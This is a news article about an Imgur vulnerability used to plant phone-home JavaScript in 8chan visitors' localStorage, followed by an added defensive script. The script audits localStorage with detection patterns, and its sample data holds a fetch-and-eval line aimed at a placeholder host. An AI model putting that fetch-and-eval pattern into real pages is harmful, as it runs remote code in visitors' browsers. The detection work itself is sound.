
This article is more than 1 year old

Hackers upload bot code to Imgur in 8Chan attack

Image board slings fix at JavaScript hole.

A nasty vulnerability in Imgur was used by attackers to hide malicious code in images, commandeer visitors' browsers, and hose the 4Chan and 8Chan image boards.

Imgur has fixed the hole, preventing the upload of malicious images, and says the compromised pages were served in targeted attacks and not published to the site's main gallery page.

The attack planted JavaScript in victims' local storage that sent a ping to the attacker's command and control servers whenever 8Chan was visited.

Compromised images were posted to 4Chan and a related Reddit subreddit page.

The attacker's intent is unknown and the command and control server is not known to have issued commands to infected machines.

Imgur has restricted its servers to hosting only "valid" image files and nixed the ability to serve JavaScript.

"Yesterday a vulnerability was discovered that made it possible to inject malicious code into an image link on Imgur," Imgur community director Sarah Schaaf says.

"From our team's analysis, it appears the exploit was targeted specifically to users of 4chan and 8chan via images shared to a specific sub-reddit on Reddit.com using Imgur’s image hosting and sharing tools.

"The vulnerability was patched yesterday evening and we’re no longer serving affected images, but as a precaution we recommend that you clear your browsing data, cookies, and localstorage."

Reddit users say the attacker's JavaScript created an off-screen iframe and embedded a Flash file that ran alongside Imgur's other Flash components, making the attack less suspicious.

"This flash file injected more JavaScript into the page [which looked] like an innocuous Pikachu animation," one Reddit user says.

"This JavaScript was stored to the user's localstorage which, since the iframe was pointing at 8chan, allowed the attacker to attach JavaScript to 8chan's localstorage. Its functionality is to issue a GET request to 8chan.pw and then decrypt the response. So far no one has been able to see a response from that web service, meaning it likely wasn't activated yet or has already been deactivated. The outcome is that every time a user visited an 8chan page, it would phone home to check for instructions and then execute more JavaScript code."
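The persistence described above depends on script text sitting in a site's localStorage, which is also why Imgur advises clearing it. The following is an added example, not code from Imgur, Reddit or the article: a heuristic audit that flags storage values that look like code and removes them. The pattern list, the `makeStorage` stand-in and the sample entries are constructed for illustration.

```javascript
// Heuristic patterns for values that look like executable code (assumed list,
// not derived from the incident's actual payload).
const CODE_PATTERNS = [
  { name: "script tag", re: /<script\b/i },
  { name: "dynamic evaluation", re: /\b(?:eval|Function)\s*\(/ },
  { name: "network request", re: /\b(?:XMLHttpRequest|fetch\s*\(|importScripts)/ },
  { name: "DOM injection", re: /document\.(?:write|createElement)\s*\(/ },
];

// Walk a Web Storage-like object and report entries whose value matches a pattern.
function auditStorage(storage) {
  const findings = [];
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key) || "";
    const reasons = CODE_PATTERNS.filter((p) => p.re.test(value)).map((p) => p.name);
    if (reasons.length > 0) findings.push({ key, reasons, length: value.length });
  }
  return findings;
}

// Remove only the flagged entries and return the keys that were removed.
function purgeFlagged(storage, findings) {
  return findings.map(({ key }) => {
    storage.removeItem(key);
    return key;
  });
}

// Minimal in-memory stand-in for window.localStorage so the audit runs outside a browser.
function makeStorage(entries) {
  const map = new Map(Object.entries(entries));
  return {
    get length() { return map.size; },
    key: (i) => Array.from(map.keys())[i] ?? null,
    getItem: (k) => (map.has(k) ? map.get(k) : null),
    removeItem: (k) => { map.delete(k); },
  };
}

// Constructed sample: three ordinary settings and one value containing script text.
const sample = makeStorage({
  theme: "dark",
  favorites: '["b","tech"]',
  settings: '{"autoplay":false}',
  widget: 'var x = new XMLHttpRequest(); x.open("GET", "https://example.invalid/"); eval(x.responseText);',
});
```

In a browser, call `auditStorage(window.localStorage)` from a page on the origin being checked, since localStorage is scoped per origin. Pattern matching will not catch obfuscated values, so clearing the site's stored data as Imgur recommends remains the complete remedy.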

The attacks were reported on various 4Chan boards.

Imgur says it will release more information as it comes to hand.®

 
